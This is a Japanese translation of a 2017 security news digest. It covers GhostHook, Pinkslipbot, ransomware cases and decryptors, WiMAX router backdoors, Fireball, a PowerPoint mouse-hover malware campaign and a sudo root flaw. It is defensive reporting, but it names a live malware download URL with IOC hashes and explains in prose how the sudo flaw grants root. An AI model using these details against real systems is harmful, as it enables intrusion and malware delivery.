     CyberArkは、GhostHook攻撃についてMicrosoftにコンタクトしたが、セキュリティ アップデートのリリースは拒否されたと発言している。Microsoftは、定例のバグフィックス サイクルで、この問題をパッチするかもしれないが、GhostHookは、セキュリティ フローとして脅威ではないだろうと発言している。
     Microsoftは、GhostHook攻撃を実行するには、攻撃者が感染したマシンでカーネルレベルのアクセスを持つ必要があると発言することで彼等の決定を正当化した。カーネルレベルの権限を持つ攻撃者は、他の多くの悪意ある行動を実行することができるので、ユーザは、まず第一に、この高水準のアクセスを取得することから、攻撃者を妨げることに集中する必要がある。
     この攻撃ベクトルへのパッチをMicrosoftが拒否したことに対応して、CyberArkは、この問題は、必ずしも攻撃者のアクセスレベルにあるわけではなく、64-bit Windowsバージョンにルートキットのためのドアを開く「PatchGuardのバイパス」であると繰り返し発言している。
     現実の問題は、攻撃者が、ここ数年アクセスしていなかったプラットフォームに、ルートキットを埋め込むために彼等のテクニックを自由に使うことができるということである。
     現在、64-bitマルウェアは、マルウェア全体の1%に満たない。そして、PatchGuardは、64-bitバージョンを安全に保持し、感染を困難にしている一つの理由である。GhostHook攻撃の技術的な説明は、コチラを参照されたい。

    McAfeeが、プロキシとしてPCを使用するPinkslipbot残存物を削除する無料ツールをリリースした
    BleepingComputer : News>Security : News (2017/06/20)
     先週、McAfeeは、AmIPinkC2と名付けたツールをリリースした。このツールは、オリジナルのPinkslipbotのバイナリが感染したホストからクリーンにされ削除された場合でさえ、このマルウェアが、プロキシ リレーとして感染したコンピューターを使用し続けることを可能にするPinkslipbot感染の残存ファイルを削除するWindowsコマンドライン アプリケーションである。
     問題になっているマルウェアは、2007年に出現し、三つの別名(Qakbot, Qbot, PinkSlip)で追跡されているPinkslipbotである。

    Pinkslipbotは広く知られた深刻な脅威である

    Pinkslipbotは、マルウェアの状況に於いて、主に特定のターゲットを定めていることで広く知られた脅威である。この著者は、レギュラーユーザを追い求めていないが、歴史的に北米企業、とりわけ、コーポレートバンキング、金融機関、トレジャリーサービス等のような儲かる産業をターゲットにしていた。
     このバンキング・トロイは常にアクティブなわけではなく、大変巧みに計画されたキャンペーンの一部として周期的に回帰してくる。過去数年に於いて、多くのサイバーセキュリティ企業が、その攻撃を追跡し、様々なバージョン[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]を潰してきた。
     つい最近のキャンペーンは、感染したコンピュータのActive Directory(【訳注】 マイクロソフトによって開発されたディレクトリ・サービス・システムであり、Windows 2000 Serverから導入された、ユーザとコンピュータリソースを管理するコンポーネント群の総称(Wikipediaより))をロックアウトするPinkslipbotの亜種に気がついたIBMのセキュリティ研究者によって発見された。

    McAfeeはPinkslipbot感染中に新しい欠点を発見した

     歴史的にPinkslipbotキャンペーンを追跡してきた企業の一つがMcAfeeである。この研究者達は、昨年のVirus Bulletinセキュリティ カンファレンスで、このトロイのC&Cサーバの基盤構造の解析と、そのC&Cコミュニケーションの方法をを提示した。
     先週、過去と現在のPinkslipbotキャンペーンを検証している間に、研究者達は、このトロイの操作モード中に新しい欠点を発見した
     研究者達は、Pinkslipbotの著者が、彼等が当初思っていたよりずっと悪賢かったと発言している。McAfeeによると、ユーザのデータを盗むことに加えて、このバンキング トロイはまた、網状のネットワークで、中心となるC&Cサーバから他の感染したホストに情報を中継するためのプロキシサーバーとして、感染したホストを使用している。

    新しいMcAfeeのツールは、Pinkslipbot感染の最終的な残存物を削除する

     McAfeeによると、殆どのセキュリティツールは、このマルウェアのメインのバイナリだけを削除する。これで、感染したホストからパスワードを収集するための、このトロイの能力は活動不能になる。
     このようなPinkslipbot削除手段は、それらがプロキシサーバを作成しているコードを放置する。そして、これは、Windows UPnP(Universal Plug and Play)サービスを介して実行される。
     McAfeeの新しいツールは、これら残存ファイルを削除し、ユーザのPCを使用してC&Cコマンドを中継することや、網状になっているプロキシを介して盗まれたデータの流出を隠蔽することを妨げる。
     AmIPinkC2ツールはコチラからダウンロード可能である。McAfeeは、コチラPDF)に使用説明書を公開している。


    韓国の企業が身代金支払いの最高額を更新
    The BBC : News (2017/06/20)
     韓国のウェブホスティング会社Nayanaが、ハッカーによって機能停止にされたコンピュータのロックを解除するために100万ドル(約1億1000万円)の支払いに同意していた。
     これは記録的な金額であると信じられているが、注目されるのは、多くの身代金の支払額は決して公開されてこなかったことである。
     Nayanaの最高経営責任者は、ハッカーが当初、Bitcoinで440万ドル要求していたことを明らかにした。
     セキュリティ専門家は、企業は、そのような支払いをすべきではないし、ハッカーと交渉に入るべきでもなかったと警告している。
     Angela Sasse(The Institute in the Science of Cyber-Securityの重役)は、身代金の多さと、この企業が支払いを公表したことの両方で驚かされたと発言している。
     「これは、私が知る限り身代金の最高額であるが、一部企業は支払うだろうし、公表はしないだろう」
     「これは、韓国の規制構造の下では金額を公開する必要があり、公共心から実行されたということがあり得る」と、彼女は発言している。
     「攻撃者の観点からすると、彼等は、この企業が内密にしていて欲しかったかもしれない。このような多額の身代金は、多くの企業がセキュリティへの注意に拍車をかけるかもしれないからである。」

    支払不能者

     Erebusとして知られるこの身代金要求型マルウェアは、Microsoft Windowsを実行しているコンピュータをターゲットにしているが、変種はLinuxベースのシステムでも動作するように修正されている。
     Nayanaは、身代金を440万ドルから50万ドル未満に値切ろうとして、ハッカーと交渉に入っていたが、最終的に、倍額の100万ドルで合意したようである。
     この企業は、153のLinuxサーバーと、3400の顧客のWebサイト上のデータを暗号化されたと見られている。
     土曜日にアップデートされた投稿では、技術陣はデータ復元のプロセス中にあるが、時間がかかるだろうと追加されている。
     Nayanaの最高経営責任者は、この事件の「衝撃と被害」に関して謝罪した。
     早期のステートメントで、この攻撃は、彼の預金残高を攻撃したと、彼は発言していた。
     「現在、私は支払不能者である。私が20年間働いた全ての物は、明日の12:00に雲散霧消するだろう。」
     Ms Sasseは、身代金要求型マルウェアの攻撃者達は、此処数年大変大胆になってきていると発言している。
     「二年前、彼等は、個人と適切なセキュリティ対策ができていないと思われていた中小企業をターゲットにする傾向があったが、彼等は、より大きなターゲットが、より大きな利益を生むことを発見した。これは、実入りのいいビジネスである。」


    KasperskyがJaff身代金要求型マルウェア用復号プログラムをリリース
    BleepingComputer : News>Security (2017/06/14)
     我々は、Fedor Sinitsyn(Kaspersky Labsの上級分析アナリスト)が、Jaff身代金要求型マルウェアの弱点を発見し、今日までにリリースされた全ての変種に関する復号プログラムをリリースしたことを報告できることを幸いに思う。Jaff身代金要求型マルウェアに感染し、.jaff, .wlu, .sVn の拡張子で暗号化された人々は、この復号プログラムでファイルを無料で復元することができる。
     この復号プログラムを使用している間、あなたが何らかの疑問や、ファイルの復号にサポートを必要とするのであれば、我々の専用のJaff Ransomware Help & Support Topicに遠慮無く投稿しなさい。

    RakhniDecryptorを使用してJaff (SVN, WLU, Jaff)で暗号化されたファイルを復号する方法

     Jaff身代金要求型マルウェアに感染した犠牲者は、彼等の暗号化されたファイルに .jaff, .wlu, .sVn 拡張子の何れかが追加されていることで同定される。例えば、test.jpgと名付けられていたファイルが暗号化されると、test.jpg.jaff, test.jpg.wlu, test.jpg.sVn の何れかにリネームされているだろう。Jaffの .sVn変種によって暗号化されたファイルのフォルダの例を以下に掲げる。


    Jaffで暗号化されたファイル(画像をクリックすると拡大します)

     Jaffで暗号化されたファイルを復号する前に、この身代金要求型マルウェアを終了させる必要がある。これを実行するには、Windowsセキュリティ画面を開くために[Ctrl]+[Alt]+[Delete]キーコンビネーションを実行することによって、Windowsタスクマネージャを選択し、開く。
     タスクマネージャが開いたら、ランダムな名前で表示されているプロセスを探す。例えば、.sVnの或るキャンペーンは、SKM_C224e9930.exeのような名前を使用していた。実行されているJaffプロセスを決定したら、そのプロセスを選択した状態で、プロセスの終了ボタンをクリックし、それを終了させなさい。あなたが実行されているプロセスを特定できないのであれば、あなたのタスクマネージャの画像、もしくは実行されているプロセスのリストを、遠慮無く投稿しなさい。我々は、どのプロセスを終了させればいいかを、あなたに教えることができる。また、Jaffプロセスが実行されていない可能性もある。


    タスクマネージャ

     これで、Jaffはコンピュータ上で実行されていないので、我々は、暗号化されたファイルの復号を始めることができる。まず、RakhniDecryptorをダウンロードし、このプログラムを解凍する。次に、それを実行する。この復号プログラムが起動すると、以下に示すメイン・スクリーンが表示される。


    RakhniDecryptor

     始める前に、あなたが、バージョン 1.21.2.1(このバージョンがJaff身代金要求型マルウェアをサポートしている)を使用していることを確認する必要がある。RakhniDecryptorのバージョンをチェックするには、上図の左下隅にあるAboutをクリックしなさい。これで、RakhniDecryptorのバージョンを示す小さなウィンドウが表示される。


    About画面

     バージョン 1.21.2.1 もしくは、それ以降を使用しているのであれば、Start Scanボタンをクリックしなさい。RakhniDecryptorは、あなたに暗号化されたファイルを選択するように促してくる。Jaffで暗号化されたファイルを含むフォルダに移動し、.Word, Excel, PDF, ミュージック, 画像 ファイルの何れかを選択しなさい。


    Jaffで暗号化されたファイルを選択する(画像をクリックすると拡大します)

     暗号化されたファイルを選択すると、RakhniDecryptorは、同様に脅迫文を選択するよう要請してくる。


    Jaffの脅迫文を選択する(画像をクリックすると拡大します)

     脅迫文を選択したら、Openボタンをクリックする。RakhniDecryptorは、これで暗号化されたファイルに関してコンピュータ全体をスキャンし、それらを復号するだろう。


    Jaffで暗号化されたファイルをスキャン中

     このプロセスは大変長い時間がかかるので、この復号プログラムがコンピュータをスキャンし、暗号化されたファイルを復号する間、辛抱しなさい。
     このプロセスが終了すると、以下に示す完了画面が表示される。


    復号完了

     この復号プログラムによって復号されたJaffファイルの完全なリストを見るには、detailsのリンク(【訳注】 上の画像中のScan Completedの2行下、Processed: の右端)をクリックしなさい。


    スキャン結果のページ(画像をクリックすると拡大します)

     あなたのファイルは現在復号されているけれども、暗号化されたオリジナルのファイルは残されたままであることに留意する必要がある。


    復号されたフォルダのファイル(画像をクリックすると拡大します)

     あなたのファイルは、これで復号されたが、暗号化されたオリジナルのファイルはコンピュータ上に残ったままになっている。ファイルが適切に復号されたことを確認したら、暗号化されている全てのファイルを或る特定のフォルダに移動させるためにCryptoSearchを使用しなさい。これで、暗号化されているオリジナルのファイルを削除したり、アーカイブしたりすることができる。

     これで、ファイルは復号されたので、RahkniDecryptorを終了しなさい。


    研究者が、Windows Defenderエンジンの修正は不完全と発言
    The Register : Security (2017/06/15)
     立て続けのWindows Defenderを修正するためのパッチにも拘わらず、少なくとも一人のセキュリティ研究者が、未だ実行されなければならなない仕事が存在していると認識している。
     Zer0conのようなカンファレンスでプレゼンしてきたJames Leeは、The Registerに接触し、脆弱性の中核であるコンポーネントMsMpEngが、依然としてリモートコード実行を被る可能性があると発言している。
    Tavis Ormandyと、それに続いたProject Zeroの研究者Mateusz Jurczykによって公開されたバグ同様に、Leeが我々に概要したバグは、不十分なSandbox化のために生じている。
     彼は我々に対して完全な詳細を提供していないが、彼は、Youtubeにリモートコード実行の概念の証明(proof-of-concept)ビデオを投稿している。

    Youtubeのビデオ 1 Youtube ビデオ

    Youtubeのビデオ 2 Youtube ビデオ

     最初のビデオで見られたように、システムを完全にパッチしているにも拘わらず、Leeの作業はWindows Defenderをクラッシュし、再起動が不可能なことを示している。
     Leeは、彼の発見が、Project Zeroの最近の公開に対するMicrosoftの修正に関連していないと、The Registerに告げている。これらは(彼がeMailで記述している)、彼が、Type Confusion(データの型の処理での問題の発生)と論理的なバグを掘り下げている間に、「複数のDoS、整数オーバーフロー、use-after-free(解放済みメモリの使用)バグ」に広がった。
     MsMpEngがサンドボックス化されている必要があるとするLeeのデモンストレーションは、Ormandyの別のTweetにも一致している。
     5月始めから、MsMpEngの不十分なサンドボックス化は、研究者から批判の増大を招いていた。昨日、さらにもう一つのサンドボックス・エスケープが、Thomas VanhoutteによってGitHubに投稿された。この脆弱性(未だ確定していないと、Vanhoutteは記述している)は、ゲスト権限の攻撃者にDefenderを使用する能力を与え、Dllを含む任意のファイルを削除できるようにするものである(これは、様々なハイジャックの機会を提供することになるだろう)。


    一部の古いWiMAXルータは、OEMバックドアを含んでいる
    BleepingComputer : News>Security (2017/06/07)
     WiMAXテクノロジを基礎とする一部の古いルータは、そのデバイスの供給プロセスの何処かで導入されたと思われるバックドア アカウントを含んでいる。
     これらのバックドア アカウントは、SEC Consultのセキュリティ研究者達が、インターネット上にWebベースの管理コンソールを露出させていた数万のWiMAXルータを発見した2016年09月に明るみに出た。
     幾つかのデバイスのファームウェアを検査した後、研究者達は深刻な脆弱性と、幾つかのバックドア アカウントも発見した。

    攻撃者は管理アカウントのパスワードを変更することができる

     彼等が発見した脆弱性は、CVE-2017-3216であり、これは、Webベース管理パネルの認証をバイパスするものである。研究者達によると、攻撃者は、これらのルータと共に出荷された組み込みのWebサーバ上のファイルにアクセスすることができ、メインの管理アカウントのパスワードを変更することができる。
     「攻撃者は、デバイスへのアクセスを取得でき、その背後にあるネットワークにアクセスでき、そして、に更なる攻撃(Miraiのようなボットネット中にデバイスを追加したり、あるいは、単にユーザをスパイする)を起動することができる」と、SEC Consultチームは発言している。これによって影響を受けるルータは以下である。

      GreenPacket OX350 (Version: ?)
      GreenPacket OX-350 (Version: ?)
      Huawei BM2022 (Version: v2.10.14)
      Huawei HES-309M (Version: ?)
      Huawei HES-319M (Version: ?)
      Huawei HES-319M2W (Version: ?)
      Huawei HES-339M (Version: ?)
      MADA Soho Wireless Router (Version: v2.10.13)
      ZTE OX-330P (Version: ?)
      ZyXEL MAX218M (Version: 2.00(UXG.0)D0)
      ZyXEL MAX218M1W (Version: 2.00(UXE.3)D0)
      ZyXEL MAX218MW (Version: 2.00(UXD.2)D0)
      ZyXEL MAX308M (Version: 2.00(UUA.3)D0)
      ZyXEL MAX318M (Version: ?)
      ZyXEL MAX338M (Version: ?)

     * 他のルータも影響を受ける可能性が高い。

    不可解なOEMバックドアのケース

     SEC Consultの研究者達は、彼等がオペレーションを検査している間、彼等が使用したツールは、一部のルータのファームウェア中にハードコードされていた大量のUNIXスタイルのパスワード ハッシュを見つけ出した。これらのタイプのハッシュは、デバイスにバックドア アカウントが付属している場合にだけ現れる。


     コードを詳細に調べた後、彼等は、認証バイパス脆弱性とバックドア アカウントの両方が、台湾のハードウェア企業MediaTek(【訳注】 メディアテック)によって開発されたSDKを介して導入されていたことを明確にした。
    CERT/CCの職員と共に研究者達はMediaTekに接触したとき、この会社は、これらの問題が発見されたファイルは、彼等のオリジナルのSDKパッケージの一部ではないと発言した。
     SEC Consultによると、この脆弱性とバックドアアカウントの両方に関し、MediaTekはファームウェアに何らかの追加を行った可能性のある源泉としてZyXEL(【訳注】 ザイセル、台湾新竹市にあるネットワーク機器製造業者(Wikipediaより))を非難した。
     SEC Consultの更なる捜索は、他の影響を受けるベンダ(GreenPacket, Huawei, ZTE)を明らかにした。これらの企業全てが、ZyXELの姉妹会社であるMitraStar(盟創科技)からホワイトラベルのルータを購入していた。この発見は、ZyXELの開発者達がSDKを変更し、彼等の同僚とそれを共有したというMediaTekの理屈を肯定するものであった。
     誰がMediaTekのSDKを改竄していようと、このデバイスは、バックドアがその仕事をするために異なるISPに拡散することは考え難い。

    数万のルータがオンラインで利用可能になっている

     影響を受ける殆どのルータは、かなり昔(2010年頃に製造された)のものである。Huawei(ファーウェイ)は、影響を受けるモデルの全てに関して2014年頃にサポートを停止したと発言している。
     これにも拘わらず、研究者は、インターネット ワイドなスキャンは、管理インターフェースをオンラインに晒されている脆弱性のあるWiMAXベースのルータを5万から10万の間で検出したと発言している
     この大きな数は、多くの脆弱性のあるルータが、Defaultの設定のままなので、WebパネルをWANインターフェースに晒している事実によって正当化される。
     あなたのISPが、そのインターフェースへのアクセスを特にブロックしている場合を除き、あなたが現在影響を受けるルータの何れかを使用しているのなら、ボットネット操作者の誰かが、立ち所にあなたのデバイスを乗っ取る可能性は高いだろう。あなたのWiMAXルータが、WANポートを介した管理インターフェースへのアクセスをブロックすることを可能にしているのであれば、その機能を有効にすることは適切な考えである。
     全体的に見て、WiMAXが、そのうちLTE Advancedによって置き換えられる古いテクノロジであるということを考慮に入れたならば、脆弱性のある製造物の数は、非常に多いと言える。

    WannaCry後、Fireballマルウェアが2億5000万のコンピュータに感染している。インドが最悪の影響を受けた
    Fossbytes : News (2017/06/07)
     概要: Fireballは、WindowsとmacOSデバイスをターゲットにして広まっている新しく悪名高いマルウェアである。中国のマーケティング企業Rafotechによって開発されたFireballは、ユーザのWebブラウザを制御し、インチキの広告クリックを生成する。これはまた、Webブラウザにあらゆる変更を実行し、より有害なマルウェアをインストールする能力を特徴としている。ユーザは、ブラウザに疑わしい要素やアドオンを探すようにアドバイスされている。

     WannaCry身代金要求型マルウェアが世界中の数十万のコンピュータを撃滅した後、我々はFireballと名付けられた別の危険なマルウェア キャンペーンが台頭していることを目撃している。セキュリティ企業
    Check PointのThreat Intelligenceは、大量の脅威(世界中の2億5000万を超えるコンピュータに感染)を発見した。
     中国を発生源とするこのマルウェアは、二つの主な能力を持っている。このマルウェアは、犠牲者のコンピューター上で、あらゆる悪意あるコードを実行できる。このマルウェアはまた、不正な広告収入を生み出すために、感染したユーザのトラフィックをハイジャックし、巧みに取り扱うこともできる。最も感染させられている国は、インド(10.1%)、ブラジル(9.6%)である。
     全体としてFireballマルウェア オペレーションはRafoteck(北京を本拠とする大手マーケティング代理店)によって実行されているということを知ると、あなたは驚かされるだろう。この会社は、WebブラウザのホームページやDefault検索エンジンをインチキのものに変更するためにFireballマルウェアを使用している。
     Check Pointは、Fireballのようなハイブリッド作成物(半分外見的にはまともなソフトウェア、半分マルウェア)をブラウザハイジャッカーと呼んでいる。現在Rafotechは、インチキのインターネット トラフィックを生成するためにFireballを使用しているが、マルウェアの一般的なあらゆるアクションを実行できることに留意しなさい。

     これは、Fireballが、ユーザを悪意あるWebサイトに振り向けたり、マルウェアの投下を実施したり、犠牲者をスパイしたりする先進的な能力を持っていることを意味している。Fireballの設計は先進的であり、回避テクニックとマルチレイヤー アンチ検出テクニックを含んでいる。更に、Fireballはまた、フレキシブルなC&Cサーバを持っている。
     しかし、Fireballは、どのように拡散したのだろうか? Fireballに関して、Rafotechは、なんとかバンドリング(同梱)と呼ばれるアドウェア配布ルートを利用している。Rafotechは、望まれたプログラムに不要なプログラムとしてFireballを同梱する拡散方法を使用している。

    Fireballに感染しているか否か確認するには?

     あなたがFireballに感染しているか否かチェックできるように、Check Pointは、幾つかの簡単なポイントを提示している。以下に尋ねられている質問の答えが No であれば、あなたはアドウェアに感染している可能性がある。

     最初に、Webブラウザを開きなさい。
     Webブラウザのホームページと検索エンジンに注目しなさい。それは、あなたが設定したものか?
     あなたは、ホームページや検索エンジンを変更することができるか?
     あなたは、Webブラウザにインストールしている拡張を認識しているか?

     殆どのアドウェアを削除するには、コンピュータから単純にそのアプリケーションを削除するだけである。Windowsでは、Windowsのコントロールパネルから、プログラムの追加と削除 / プログラムと機能 で実行することができる。Macでは、Finderで、そのアプリケーションを探しだし、その疑わしいプログラムをTrashにドラッグする。
     あなたはまた、適切なアンチマルウェアとソフトウェア クリーナーを使用してコンピュータをスキャンしクリーンにすることもアドバイスされている。また、Webブラウザの 拡張/アドオン リストを検索し、疑わしい物を削除することもできる。
     Fireballマルウェアに関する詳細に関しては、コチラを参照しなさい。


    リンクにマウスをホバー(かざした)時、PowerPointファイルは、マクロを要求することなくマルウェアをダウンロードする
    BleepingComputer : News>Security (2017/06/02)
     セキュリティ研究者は、犠牲者がリンクにマウスホバー(マウスをかざす)した時、コンピュータにマルウェアをダウンロードするブービートラップされたPowerPointファイルに注目している。これは、マクロ スクリプトを要求しない。
     このファイルは、eMail添付ファイルとして犠牲者になる可能性のあるものに対して配布されているPowerPointプレゼンテーション ファイルであり、件名は、"RE:Purchase orders #69812" もしくは、 "Fwd:Confirmation"である。このPowerPointファイル自体の名前は、"order&prsn.ppsx", "order.ppsx", "invoice.ppsx"であり、ZIPファイル内部に拡散していた証拠も存在している。


    ブービートラップされたPPSXファイルを配布しているスパム メール(画像をクリックすると拡大します)

     前略
     5月31日(水)にロンドンからサリーへの器材の移動に関する注文書をご確認ください。
     草々

    Nasim Khan , E-Pharm Limited
    Phone : +44 (0) 203 3002245

    これらPPSXファイルは、開いた時に、PowerPoint編集モードの代わりに、PowerPointの発表者ビューになることを除いて、PPTXファイルと全く等しい。
     このPowerPointファイルは、ハイパーリンクに変換されたテキスト"Loading...Please wait"を含む以下の内容(下の画像)の一枚のスライドだけを含んでいる。


    PPSXファイルのコンテンツ

     ユーザがこのURLにマウスをホバーすると必ず、悪意あるコードが実行され、PowerShellが起動され、以下のコードを実行しようとする。


    悪意あるコード[難読化されている](画像をクリックすると拡大します)


    悪意あるコード[難読化解除](画像をクリックすると拡大します)

     ユーザがOfficeインストレーションを、保護ビュー セキュリティ機能を有効にして使用していたなら、Officeは、攻撃の実行を停止するだろう。


    Officeの保護ビューが、悪意あるコードの実行を停止

     保護ビューを無効にしているユーザや、ユーザがポップアップを無視しコードの実行を許可した時には、悪意あるPowerShellコードが、http://cccn.nl/c.php に接続を企て、別のファイルをダウンロードするだろう。
     我々のテストの間、この悪意あるPPSXファイルは、平凡なマルウェア ローダーをダウンロードした。これは、ユーザのローカルTempフォルダに保存され、後で、cmd.exe を介して実行ファイルを起動しようとする。

    Office保護ビューは、「リンク ホバー」テクニックから保護する

     Bleeping Computerのコンタクトに対して、Microsoftのスポークスマンは、この攻撃ベクトルに関する詳細な情報を提供した。

    Officeの保護ビューは、Defaultで有効になっている。そして、このレポート中で説明されているテクニックに対して防御する。Windows DefenderとOffice 365のAdvanced Threat Protectionも、このマルウェアを検出し削除する。我々は、ユーザが適切なコンピューター習慣をオンラインで実践するよう促しており、コンテンツを有効にしたり、Webページヘのリンクをクリックしたりした時、注意するようにしている。

     Microsoftが、彼等のステートメントで発言しているように、Office ProtectedがDefaultで有効になっているので、Officeは、このテクニックに対して防御する。この機能をOFFにしていることを認識しているユーザや組織は、この攻撃ベクトルを考慮に入れるように、彼等のポリシーを検証する必要がある。

    IOCs

    PowerPointファイル:
    796a386b43f12b99568f55166e339fcf43a4792d292bdd05dafa97ee32518921
    f05af917f6cbd7294bd312a6aad70d071426ce5c24cf21e6898341d9f85013c0

    第二ステージ EXE:
    9efc3aa23de09f1713a2e138760a42d0a14568c86cdbb5499d2adddbe197db57


    WannaCryに開発エラー、ファイル復元の可能性
    Kaspersky : ThreatPost (2017/06/01)
     WannaCryは、5月12日に、NSA(米国国家安全保障局)が武器化したEternalBlueエクスプロイトを利用して150カ国のコンピュータを感染させ、世界中に大損害を発生させたが、これは、身代金要求型マルウェアの高級品であったことを意味してはいない。
     このコード中の幾つかのプログラミングエラーが表面化し、研究者達は、復号キー無しにファイルを復元することがシステム管理者にとって実現可能になっていると発言している。
     Kaspersky Labは、このマルウェアによって暗号化されたファイルを復元するために活用できるWannaCry中の幾つかの問題を公開した。今迄、20万コンピュータがWannaCryによって攻撃され、その拡散は、そのコード中にキルスイッチが発見された後シャットダウンされた。これは、このコードの作者が一流でない可能性があるという最初のヒントであった。
     「経験ある身代金要求型マルウェアの作者は、このような失敗はしない」と、「我々の立場からすると、我々は、WannaCryの開発者は、全く開発の経験が無いように思われる」と、Anton Ivanov(Kaspersky Labの上級マルウェア アナリスト)は発言している。
     Ivanovは、同僚のFedor Sinistyn, Orkhan Mamedovと共に、本日Securelist.com上にWannaCryの開発者が作成した二つの重大なエラーを説明するレポートを公開した。この二つのエラーは、管理組織が、失ってしまいそうなファイルを復元するために入手可能な復元ソフトウェアを使用することを可能にするものである。
     「我々の内部テストは、多くのファイルを取り戻すために、かなりの確率があることを示している」と、「システム管理者は、フリーウェアをダウンロードし、影響を受けたコンピュータ上で実行することができる。ファイルの復元に特別な経験を必要としない」と、Inavovは発言している。
     このマルウェア中の一つの弱点は、犠牲者のハードドライブからファイルを削除するためのプログラミング ロジック中のエラーに関連している。WannaCryは、ローカル ハードドライブ上のファイルを暗号化するとき、オリジナルファイルに .WNCRYT 拡張子を追加する。これらのファイルは、暗号化され .WNCRYT 拡張子が加えられ、オリジナルファイルは削除される。ファイルが、犠牲者のデスクトップやドキュメント フォルダにもともと存在していたのであれば、そのオリジナル ファイルは削除される前にデータで上書きされるので、復元は不可能であると、この研究者達は発言している。

     しかしながら、ファイルがローカルドライブ上の他の場所に保存されていた場合は、それらのファイルは上書きされずに、削除されるだけなので、復元ソフトで復元できる可能性があると、この研究者達は発言している。
     この研究者達はまた、この身代金要求型マルウェアが、Windows File Explorerで不可視に設定されている$RECYCLEフォルダを作成している(これはオリジナルファイルが暗号化された後、此処に移動させられることが意図されている)と、発言している。
    「しかしながら、多くの場合、この身代金要求型マルウェア コード中の同期エラーのために、オリジナルのファイルは同じディレクトリ中に存在しており、$RECYCLEには移動されていない」と、「オリジナルのファイルは安全ではない方法で削除されている。この事実は、データ復元ソフトを使用して削除されたファイルを復元することを可能にしている」と、彼等は記述している。
     WannaCryの読み込み専用(Read Only)ファイルの処理はまた、ファイルの復元を容易にするバグを、その中に持っている。
     「そのようなファイルが、感染したマシン上に存在している場合、この身代金要求型マルウェアは、絶対にそれら読み込み専用ファイルを暗号化しない」と、「夫々のオリジナルファイルの暗号化されたコピーを作成するだけであり、オリジナルファイル自体は、これが発生した時、’hidden’(隠し)属性を付加されるだけなので、このようなファイルを発見し通常の属性に戻すだけで復元できる」と、この研究者達は発言している。

     研究者達は、WannaCryによって暗号化されたファイルの復号プログラムの構築に取り組んでいた。QuarksLabのAdrien Guinetは、このマルウェアによってローカルに格納されたRSA公開鍵を因数に分解するのに用いられるメモリから素数を復元できるWannaKeyと呼ばれるツールを構築しリリースした。この公開鍵は、暗号化されたファイルに使用された秘密鍵を再構築するために使用することができると、Guinetは発言している。彼は更に、Benjamin Delpyによって構築されたWanaDecryptと呼ばれるツールを使用することで成功したと付け加えている。Delpyの発言によると、彼はまた、Windows XPとWindows 7で動作するWanakiwiと呼ばれる別の復号プログラムを構築している。
     しかしながら、Ivanovは、これらのツールを使用したテストでは、ファイルの復号に成功しなかったと発言している。
     「彼等(【訳注】 WannaCryの開発者)がWannaCryで上手く実行した唯一のことは、このマルウェアの暗号文部分である」と、「しかし、これはロケット科学ではないので、この暗号化スキームは、他の人気のある身代金要求型マルウェア ファミリーに使用される」と、Ivanovは発言している。


    Linuxのsudoコマンドの脆弱性に対するパッチが利用可能になった
    Kaspersky : ThreatPost (2017/05/31)
     Red Hat, Debian, その他のディストリビューションは昨日、深刻度「高」のsudoの脆弱性に関するパッチをリリースした。この脆弱性は、ルート権限を取得するためにローカル攻撃者(【訳注】 ローカル攻撃: 攻撃者が物理的なアクセスや正当なリモートアクセスによって接続しているコンピュータまたはネットワークに対して行われる攻撃。これには、攻撃者が実際に使用しているコンピュータや、そのコンピュータが接続されているネットワークが含まれることもある(Symantec用語集より))によって悪用される可能性があった。
     sudoは、LinuxやUNIXシステム用のコマンドであり、標準ユーザがスーパーユーザーとして、ユーザの追加や、システムアップデートの実行のような特定のコマンドを実行することを可能にするものである。
     今回の場合、Qualysの研究者は、sudoのget_process_ttyname関数中に脆弱性を発見した。これは、sudo権限を有するローカル攻撃者が、ルートとして、もしくはルートに権限を昇格してコマンドを実行することを可能にするものである。
     sudoプロジェクトWebサイト上の警告は、システムでSELinux(【訳注】 アメリカ国家安全保障局 (NSA) がGPL下で提供しているLinuxのカーネルに強制アクセス制御 (MAC) 機能を付加するモジュールの名称であり、Linuxのディストリビューションではない(Wikipediaより))が有効になっており、sudoがSELinuxサポートと共に構築された場合に、この脆弱性が引き金となると発言している。sudo 1.8.6p7 から 1.8.20 が影響を受ける。ユーザは、sudo 1.8.20p1 にアップデートしなければならない。
     「Linuxシステムでは、sudoは、プロセスのtty(field 7)のデバイス番号を決定するために /proc/[pid]/stat ファイルを解析する。ファイル中のこのフィールドは、スペースで区切られているが、これは、コマンド名(field 2)に空白(改行を含む)が含まれることを可能にしている。そして、sudoは、これに関して釈明していない。sudo権限を持つユーザーは、sudoバイナリから空白(その後に数字が続く)を含む名前に対してシンボリックリンクを作成することによって、そのユーザが選択しているデバイス番号を使用するためにsudoを呼び出すことができる」と、sudoアドバイザリは発言している。
     Qualysは、この記事へのコメントを辞退している。
     「脆弱性攻撃された場合、この問題は、攻撃者が制御を回避し、想定されている以上のことを実行することを可能にする」と、「攻撃者は前もってサーバー上に存在する必要があり、この脆弱性を使用するにはsudoを介してコマンドへのアクセスを許可されている必要がある」と、Red HatセキュリティチームはThreatpostに告げた。
     Debianのwheezy, jessie, sidやSUSE Linuxの幾つかの製品を含む他のディストリビューションが修正をリリースしたのと同様に、Red Hatは、Red Hat Enterprise Linux 6, Red Hat Enterprise Linux Server, Red Hat Enterprise Linux 7用の修正を昨日リリースしたと発言している。
     Qualysは、システムがパッチされた時点で、そのエクスプロイトを公開するだろうと発言している。
     「SELinuxを有効にしているシステムでは、ユーザが、彼に完全なルート権限を許可しないコマンドに関してSudoer(【訳注】 正確にパスワードを指定することなく他のユーザのセキュリティ権限でプログラムを実行することを許可されているユーザ(Wiktionary英語版の和訳))であるなら、彼は、ファイルシステム上のあらゆるファイル(ルートが所有しているファイルを含む)を、彼のコマンドの出力で上書きすることができる。これは、relabel_tty()(src/selinux.c内)が、彼のttyに関してopen(O_RDWR|O_NONBLOCK)をコールし、そのコマンドのstdin, stdout, stderrにそれをdup2()するからである」と「これはまた、あらゆるSudoerユーザが完全なルート権限を取得することを可能にしている」と、Qualysの研究者は、OSS-Securityメーリングリスト上に公開したアドバイザリで記述している。

    SIOSセキュリティ ブログより引用

    主なディストリビューションの対応方法

    詳細は、各ディストリビューションの提供元にご確認ください
    Debian
    https://security-tracker.debian.org/tracker/CVE-2017-1000367

    Red Hat Enterprise Linux/CentOS
    https://access.redhat.com/security/cve/CVE-2017-1000367

    ubuntu
    https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-1000367.html

    SUSE/openSUSE
